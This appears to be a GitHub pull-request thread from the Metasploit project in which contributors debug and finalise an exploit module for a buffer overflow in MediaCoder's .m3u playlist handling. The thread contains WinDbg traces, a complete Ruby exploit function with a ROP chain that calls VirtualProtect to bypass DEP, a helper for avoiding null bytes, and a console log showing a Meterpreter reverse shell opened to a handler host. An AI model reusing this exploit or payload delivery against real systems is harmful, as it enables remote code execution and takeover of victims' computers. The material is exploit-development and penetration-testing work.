ModLoad: 6dcf0000 6dcf9000   C:\Windows\System32\CSCDLL.dll
ModLoad: 723c0000 723cb000   C:\Windows\system32\CSCAPI.dll
ModLoad: 6dc80000 6dcef000   C:\Windows\system32\ntshrui.dll
ModLoad: 75720000 75739000   C:\Windows\system32\srvcli.dll
ModLoad: 741e0000 741ea000   C:\Windows\system32\slc.dll
ModLoad: 73c40000 73c6f000   C:\Windows\system32\xmllite.dll
ModLoad: 6d990000 6da24000   C:\Windows\system32\MsftEdit.dll
ModLoad: 73c40000 73c6f000   C:\Windows\system32\xmllite.dll
ModLoad: 68bb0000 68c3c000   C:\Windows\system32\UIAutomationCore.dll
ModLoad: 75960000 759bf000   C:\Windows\system32\SXS.DLL
ModLoad: 68b20000 68b7c000   C:\Windows\System32\StructuredQuery.dll
ModLoad: 757a0000 757a8000   C:\Windows\System32\Secur32.dll
ModLoad: 6db00000 6db4e000   C:\Windows\system32\actxprxy.dll
ModLoad: 6e850000 6e87b000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 732c0000 732d6000   C:\Windows\system32\thumbcache.dll
ModLoad: 6e9a0000 6ea3f000   C:\Windows\system32\SearchFolder.dll
ModLoad: 6dad0000 6dafe000   C:\Windows\system32\SHDOCVW.dll
ModLoad: 6d270000 6d408000   C:\Windows\system32\NetworkExplorer.dll
ModLoad: 73080000 73092000   C:\Windows\system32\MPR.dll
ModLoad: 73200000 73208000   C:\Windows\System32\drprov.dll
ModLoad: 74c50000 74c79000   C:\Windows\System32\WINSTA.dll
ModLoad: 696f0000 69704000   C:\Windows\System32\ntlanman.dll
ModLoad: 6c0f0000 6c107000   C:\Windows\System32\davclnt.dll
ModLoad: 6fdd0000 6fdd8000   C:\Windows\System32\DAVHLPR.dll
ModLoad: 6dac0000 6dac9000   C:\Windows\system32\LINKINFO.dll
ModLoad: 74dd0000 74ddf000   C:\Windows\system32\wkscli.dll
ModLoad: 75200000 75209000   C:\Windows\system32\netutils.dll
(1008.17e4): Unknown exception - code 000006ba (first chance)
ModLoad: 66550000 66788000   C:\Windows\system32\wpdshext.dll
ModLoad: 74e00000 74f90000   C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
ModLoad: 6fd40000 6fdc9000   C:\Windows\system32\PortableDeviceApi.dll
ModLoad: 6edc0000 6edeb000   C:\Windows\system32\PortableDeviceTypes.dll
ModLoad: 696b0000 696ef000   C:\Windows\system32\audiodev.dll
ModLoad: 67b30000 67d97000   C:\Windows\system32\WMVCore.DLL
ModLoad: 69650000 6968d000   C:\Windows\system32\WMASF.DLL
ModLoad: 68b80000 68ba2000   C:\Windows\system32\EhStorAPI.dll
ModLoad: 05a70000 05ad1000   image05a70000
ModLoad: 05a70000 05ad1000   image05a70000
(1008.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000005e ebx=764dcc28 ecx=04d61b28 edx=fb3ce4d8 esi=005308c8 edi=000a032a
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 7cc6f481
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3              ret

ESP points to:

0:000> dd esp
0012f468  6ab16202 6ab16202 6ab16202 6ab16202
0012f478  6ab16202 6ab16202 6ab16202 6ab16202
0012f488  100482ff ffffffc0 63547658 66d9d9ba
0012f498  6ab2241d 4b657443 4b657443 4b657443
0012f4a8  4b657443 4b657443 4b657443 4b657443
0012f4b8  4b657443 4b657443 4b657443 4b657443
0012f4c8  4b657443 4b657443 4b657443 4b657443
0012f4d8  1004cc03 6ab561b0 66d9feee 6ab19780
0:000> dd /c1 esp
0012f468  6ab16202
0012f46c  6ab16202
0012f470  6ab16202
0012f474  6ab16202
0012f478  6ab16202
0012f47c  6ab16202
0012f480  6ab16202
0012f484  6ab16202
0012f488  100482ff
0012f48c  ffffffc0
0012f490  63547658
0012f494  66d9d9ba
0012f498  6ab2241d
0012f49c  4b657443
0012f4a0  4b657443
0012f4a4  4b657443
0012f4a8  4b657443
0012f4ac  4b657443
0012f4b0  4b657443
0012f4b4  4b657443
0012f4b8  4b657443
0012f4bc  4b657443
0012f4c0  4b657443
0012f4c4  4b657443
0012f4c8  4b657443
0012f4cc  4b657443
0012f4d0  4b657443
0012f4d4  4b657443
0012f4d8  1004cc03
0012f4dc  6ab561b0
0012f4e0  66d9feee
0012f4e4  6ab19780

Windows version:

0:000> version
Windows 7 Version 7600 MP (4 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7600.16385 (win7_rtm.090713-1255)
Machine Name:
Debug session time: Tue Jul  9 10:57:48.363 2013 (GMT+7)
System Uptime: 0 days 0:23:06.472
Process Uptime: 0 days 0:09:18.685
  Kernel time: 0 days 0:00:01.138
  User time: 0 days 0:00:00.546
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" '  Debugger Process 0x173C 
dbgeng:  image 6.11.0001.404, built Thu Feb 26 08:55:43 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbgeng.dll]
dbghelp: image 6.11.0001.404, built Thu Feb 26 08:55:30 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
        DIA version: 11212
Extension DLL search Path:
    C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files\Common Files\Lenovo;C:\Program Files\Common Files\Ulead Systems\MPEG;C:\Program Files\Lenovo\Access Connections\;C:\Program Files\Lenovo\Client Security Solution
Extension DLL chain:
    dbghelp: image 6.11.0001.404, API 6.1.6, built Thu Feb 26 08:55:30 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
    ext: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:30 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
    exts: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:24 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
    uext: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:26 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\uext.dll]
    ntsdexts: image 6.1.7015.0, API 1.0.0, built Thu Feb 26 08:54:43 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]

Same result as mine. Any idea how to resolve this? Maybe add more ROP NOP (0x00000168). It would be good if this module support DEP, since mediacoder.exe is DEP aware.

@modpr0be modpr0be closed this Jul 9, 2013
@modpr0be modpr0be reopened this Jul 9, 2013
@modpr0be
Copy link
Contributor Author

modpr0be commented Jul 9, 2013

Errh, accidentally click the close & comment button.

@corelanc0d3r
Copy link
Contributor

it's not that uncommon to see offset differences between Win7 x86 and Win7 x64 (wow64) - a ROP NOP landing zone should take care of that

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 9, 2013

I see modpr0be tested on a Win 7 SP0 box based on his kernel32.dll info, so I setup the same Win 7 box, and then I got it to work:

Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=7756660d esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=7756660d esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f464  6ab16202  <-- Landed on the ROP NOP we want

So perhaps the offset is more specific to the service pack, rather than wow64 vs x86 this time?? I think Juan has been testing on Win 7 SP1, right? If the module doesn't work reliably on SP1, then I suggest:

  1. Add Win 7 SP1 as a new target, and then pad 0x186 bytes of ROP NOPs to make sure it lands correctly.
  2. Ignore the Win 7 SP1 target for now. Modify the current module target description to "MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP0"

Either way works for me.

@modpr0be
Copy link
Contributor Author

modpr0be commented Jul 9, 2013

Actually, my test before the last one was tested in Win 7 SP1:

0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f464  6ab16202     <-------- Hit the rop nop as we wanted.

Windows version:

0:000> version
Windows 7 Version 7601 (Service Pack 1) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7601.18015 (win7sp1_gdr.121129-1432)
Machine Name:
Debug session time: Tue Jul  9 12:49:47.327 2013 (UTC + 7:00)
System Uptime: 0 days 0:08:58.106
Process Uptime: 0 days 0:03:30.334
  Kernel time: 0 days 0:00:01.747
  User time: 0 days 0:00:02.137
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" '  Debugger Process 0x15D4 
dbgeng:  image 6.12.0002.633, built Tue Feb 02 03:08:31 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbgeng.dll]
dbghelp: image 6.12.0002.633, built Tue Feb 02 03:08:26 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
        DIA version: 20921
Extension DLL search Path:
    C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Python27;C:\Python27\Lib;C:\Program Files\GNU\GnuPG\pub;C:\Program Files\Windows Live\Shared;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Microsoft Windows Performance Toolkit\;C:\Program Files\OpenVPN\bin;C:\Program Files\Nmap
Extension DLL chain:
    dbghelp: image 6.12.0002.633, API 6.1.6, built Tue Feb 02 03:08:26 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
    ext: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:31 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
    exts: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:24 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
    uext: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:23 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\uext.dll]
    ntsdexts: image 6.1.7650.0, API 1.0.0, built Tue Feb 02 03:08:08 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 9, 2013

I fixed the exploit() function to make it work on my box. Although it works, it's not very ideal because the pivot aligns ESP so much (0x7AC), this forces my payload to be very close to the edge of the uncommitted memory. That pretty much means if my payload is too big, the VirtualProtect function won't be able to mark the region RWX. I had to make the size parameter dynamic, because the original hardcoded value to NEG is too big.

To overcome the size problem above, it's possible to put an egghunter (that uses VirtualProtect, too) instead of the payload, and then look for a way to put the payload somewhere else for the hunger to find it. But I didn't investigate approach this further.

I'm not even sure if this modified function breaks the current one, but anyways, here's my version:

def exploit
    # fixed rop from mona.py :)
    p = payload.encoded
    rop_gadgets =
    [
        nops(true,35+491),  # ROP NOP
        0x100482ff, # POP EAX # POP EBP # RETN
        0xffffffc0, # negate will become 0x00000040
        junk,
        0x66d9d9ba, # NEG EAX # RETN
        0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
        junk(15),   # reserve more junk for add esp,2c
        0x1004a8ee, # POP ECX # RETN
        0x6ab561b0, # ptr to &VirtualProtect()
        0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN
        0x6ab19780, # XCHG EAX,ESI # RETN
        0x66d929f5, # POP EAX # POP EBX # RETN
        0xffffffff - p.length + 1,
        junk,
        0x6ab3c65a, # NEG EAX # RETN
        0x1004cc03, # POP ECX # RETN
        0xffffffff, #
        0x660166e9, # INC ECX # SUB AL,0EB # RETN
        0x66d8ae48, # XCHG ECX,EBX # RETN
        0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN
        0x6ab3d688, # POP ECX # RETN
        0x6ab4ead0, # Writable address
        0x100444e3, # POP EDI # RETN
        nops(true), # ROP NOP
        0x10048377, # POP EAX # POP EBP # RETN
        nops,       # Regular NOPs
        0x6ab01c06, # PUSH ESP# RETN
        0x6ab28dda, # PUSHAD # RETN
    ].flatten.pack("V*")

    retn_nops = [0x6afc1446].pack('V') # RETN 0x0C in postproc.dll
    sploit = "http://A"
    sploit << retn_nops*(target['Offset']/4)
    sploit << [target.ret].pack('V')
    sploit << rop_gadgets
    sploit << make_nops(16)
    sploit << p
    sploit << rand_text(target['Max']-sploit.length)

    file_create(sploit)
end

@jvazquez-r7
Copy link
Contributor

Working on W7 SP1 after applying @wchen-r7 changes:

msf exploit(mediacoder_m3u) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mediacoder_m3u) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(mediacoder_m3u) > rexploit
[*] Reloading module...

[+] msf.m3u stored at /Users/juan/.msf4/local/msf.m3u
msf exploit(mediacoder_m3u) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > expliot
[-] Unknown command: expliot.
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.147
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.147:49723) at 2013-07-09 12:56:55 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

@corelanc0d3r
Copy link
Contributor

if payload cannot contain nulls, then perhaps a check is needed to ensure that "0xffffffff - p.length + 1" will never contain a null byte
also - I think a virtualalloc chain would not have the size issue

@wchen-r7
Copy link
Contributor

I don't really have a pretty way to do this, but to avoid a null byte in his length value, I guess he can do something like:

#
# Returns a value to NEG that doesn't contain a null byte
#
def get_neg_value(payload_length)
    v = [0xffffffff - payload_length + 1].pack('V')

    while v =~ /\x00/
        payload_length += 1
        v = [0xffffffff - payload_length + 1].pack('V')     
    end

    v
end


#
# Tests the get_neg_value function
#
1.step(2048, 1) do |i|
    print "Testing: #{i.to_s}"
    orig = [0xffffffff - i + 1].pack('V')
    v    = get_neg_value(i)

    if orig == v
        puts "... value unchanged."
    else
        puts "... value changed: #{orig.unpack("H*")[0]} to #{v.unpack("H*")[0]}"
    end
end

@modpr0be
Copy link
Contributor Author

Doesn't work with @wchen-r7 changes, using windows/exec:

(1ce8.ff4): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000000 ecx=00000000 edx=7707f17d esi=00000000 edi=00000000
eip=7701410c esp=01d3ff5c ebp=01d3ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
7701410c cc              int     3
0:027> g
(1ce8.1af4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008c ebx=7714ad60 ecx=04bf8b20 edx=fb5374e0 esi=005308c8 edi=000707be
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
0:000> !exchain
0012f3f4: postproc_52+14435 (6afd4435)
Invalid exception stack at 6afc1446
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f464  6ab16202           <-- landed at ROP NOP address
0:000> dd /c1 esp+0x7cc    <-- but need 0x7cc to get first gadget
0012fc30  6ab16202            
0012fc34  100482ff             <-- first rop gadget in rop_gadgets
0012fc38  ffffffc0
0012fc3c  4655546e
0012fc40  66d9d9ba
0012fc44  6ab2241d
0012fc48  71757656
0012fc4c  71757656
0012fc50  71757656
0012fc54  71757656
0012fc58  71757656
0012fc5c  71757656
0012fc60  71757656
0012fc64  71757656
0012fc68  71757656
0012fc6c  71757656
0012fc70  71757656
0012fc74  71757656
0012fc78  71757656
0012fc7c  71757656
0012fc80  71757656
0012fc84  1004a8ee
0012fc88  6ab561b0
0012fc8c  66d9feee
0012fc90  6ab19780
0012fc94  66d929f5
0012fc98  ffffff1b
0012fc9c  444f6850
0012fca0  6ab3c65a
0012fca4  1004cc03
0012fca8  ffffffff
0012fcac  660166e9

Tested in both physical and VM (Virtual Box) environment, both gave me same result, the calc.exe never show up.
I think there is no space left for the shellcode itself, the last shellcode is cut out. I used windows/exec, it uses less space than bind/reverse shell, even meterpreter shellcode.

If you guys already tested and worked on Windows 7 SP0, then probably I should remove the SP1, change to SP0.

@wchen-r7
Copy link
Contributor

Yeah, that'd be great. Thanks.

wchen-r7 added a commit that referenced this pull request Jul 12, 2013
@wchen-r7
Copy link
Contributor

Merged, thanks.

@wchen-r7 wchen-r7 merged commit 16c9eff into rapid7:master Jul 12, 2013
@modpr0be modpr0be deleted the module-mediacoder-m3u branch April 3, 2015 14:56
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

5 participants